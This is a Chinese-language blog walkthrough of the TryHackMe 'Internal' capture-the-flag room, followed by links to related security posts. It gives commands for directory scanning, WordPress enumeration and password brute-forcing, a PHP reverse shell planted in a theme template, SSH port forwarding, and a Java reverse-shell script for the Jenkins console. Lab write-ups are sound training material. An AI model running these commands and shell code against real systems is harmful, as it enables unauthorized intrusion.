TRY HACK ME 渗透测试靶场，以基础为主层层深入，知识点讲解详细，对于想实现从零到一飞跃的白客，TRY HACK ME无非是最好的选择。而网络上资源良莠不齐，好的资源难找的一逼。因此，今天起我将与大家一起详细学习THM重要的ROOM里的内容，力求让每个人都能理解、掌握其中的内容，让我们一起学习、一起å进步、一起GET THE FLAG！

THM靶场：INTERNAL

很简单的靶场，有手就行

启动机器，连接openvpn，点击“Start Machine”获取目标IP，本次测试使用KAIL作为攻击机，连接成功后显示如下：

可以看到，这是一个apache的默认页面，根据题目的提示，我们需要先将主机添加到 /etc/hosts ，我们先nano 打开，然后将域名internal.thm添加上,我这里在MAC和KALI上都设置了，只显示一个MAC的页面供大家参考

然后，我们使用gobuster来爆破一波目录，命令构造如下：

gobuster dir -u http://10.10.103.9/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --no-error

可以看到扫描结果里，有wordpress页面，所以说可以看出来这是一个用wp搭建的blog网站，我们看下管理页面，即wp-admin：

看到wp-admin页面，我们直接搞一波wpscan，扫一下有没有相关的漏洞，构造命令：

wpscan --url http://10.10.103.9/blog -e ap,at,tt,cb,dbe,u,m

使用 -e 选项来枚举所有插件、所有主题、timthumbs、配置备份、数据库导出、用户和媒体，结果如下：

分析下没什么有用的信息，只有一个admin默认用户，下面我们直接爆破，构造命令：

wpscan --url http://10.10.103.9/blog -U admin -P /usr/share/wordlists/rockyou.txt

结果如下：

获取了用户名和密码后，我们登录WORDPRESS页面，进入后，我们上传反向shell，KALI里自带php-reverse-shell.php，复制粘贴到后台，在404模板下修改，注意这里要修改端口号和IP，然后保存下：

成功后在URL上访问页面并构造nc -lnvp 1234监听端口，获取shell成功！

列举常见文件和目录，发现了一个用户的凭据：

使用ssh登录成功！

列举全部文件，发现了flag文件，cat后再次发现一个jenkins.txt文件，很有可能网站上还有jenkins服务

我们再cat jenkins.txt文件，果然如我们所料，在8080端口上开启了jenkins服务

由于端口 8080 只能通过本地访问，设置端口转发以便将流量重定向到端口 1234 上的 localhost 到端口 8080 上的目标机器，构造命令：

ssh -f -N -L 1234:127.0.0.1:8080 aubreanna@internal.thm

看到Jenkins页面，直接打开BP抓包爆破，常规套路，这里就不赘述了，进去后有个可以传脚本的页面，上传一个大佬写的脚本，具体如下：

String host=”localhost”;
int port=8044;
String cmd=”cmd.exe”;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

最后一步，设置监听端口，直接获取root权限，最后搜索一波flag，搞定！

INTERNAL 靶场通关小结

可能是因为做的题目和写的文章已经比较多了，现在再看这样的题目只觉得很简单，得心应手、行云流水，其实无非都是那几个常规的突破口，关键还是在于培养自己信息收集的能力和洞察问题的耐心。如果有部分不明白的，可以把流程反反复复的多看几遍，同时也非常欢迎大家私信我，如果觉得内容做的不错的话，也可以关注我的公众号：HACKER 航仔以获取最新消息并与我联系，十分感谢能看到这里的各位，虽然制作不易，看到你们的点赞我还是很开心的！我们下期再见，拜了个拜～～～

TRY HACK ME ｜ INTERNAL「渗透测试挑战02」相关推荐

【保姆级】黑客入门教程「Python安全攻防：渗透测试实战指南」经典纯狱风~
前言网络江湖,风起云涌,攻防博弈,从未间断,且愈演愈烈.从架构安全到被动纵深防御,再到主动防御.安全智能,直至进攻反制,皆直指安全的本质--攻防.未知攻,焉知防! 每一位网络安全从业者都有仗剑江湖的 ...
「UI 测试自动化selenium」汇总
<selenium 基础之java实现> selenium RC 环境配置菜鸟学自动化测试(一)----selenium IDE 菜鸟学自动化测试(二)----selenium IDE ...
[车联网安全自学篇] Android安全之移动安全测试指南「安全测试和SDLC」
也许每个人出生的时候都以为这世界都是为他一个人而存在的,当他发现自己错的时候,他便开始长大少走了弯路,也就错过了风景,无论如何,感谢经历 0x01 前言尽管安全测试的原则,在最近的历史上没有发生根 ...
视频教程-Kali Linux渗透测试基础入门到进阶实战全程课-渗透测试
Kali Linux渗透测试基础入门到进阶实战全程课本人有多年的服务器高级运维与开发经验,擅长计算机与服务器攻防及网络攻防技术!对网络安全领域有持续的关注和研究! 林晓炜 ¥499.00 立即订阅 ...
只招「测试开发工程师」了
早些年(或者你入行前听说的 / 你在书本上看到的),也许有「自动测试工程师,性能测试工程师,安全测试工程师」等岗位 . 然而,随着这几年的企业最佳实战,及「围绕高效干活为目的」的落地 : 大有变化 . ...
Hack The Box，一款有意思的渗透测试平台
前言 Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法.它包含一些不断更新的挑战,其中一些模拟真实场景,其中一些更倾向于CTF风格的 ...
渗透测试平台【Hack The Box】获取邀请码与注册讲解
Hack The Box是国外很专业的在线渗透测试平台,题型范围广.更新快,深受广大安全爱好者喜爱,不过有一定门槛,比如注册也是需要解题的,这篇文章就先讲一下注册,以后会更新靶场的题解官方网址:ha ...
渗透测试 | 几款常用的CMS识别「Web指纹识别」扫描脚本工具（含下载地址）
在对「靶标资产」进行渗透测试的前期,通常需要对「靶标资产」进行相关的信息收集,而对「靶标资产」进行Web指纹信息扫描也是信息收集当中很关键的一部分. 能否有效识别出「靶标资产」的Web指纹信息,主要还 ...
[在线挑战]【i春秋】渗透测试入门 —— 渗透测试笔记 --转
[i春秋]渗透测试入门 -- 渗透测试笔记,原文 0x00 前言本题算是一道较为综合的渗透题,要求对两个服务器系统进行渗透,第一个是基于齐博 CMS 的信息资讯平台 http://www.test. ...

TRY HACK ME ｜ INTERNAL「渗透测试挑战02」

THM靶场：INTERNAL

INTERNAL 靶场通关小结

TRY HACK ME ｜ INTERNAL「渗透测试挑战02」相关推荐

最新文章

热门文章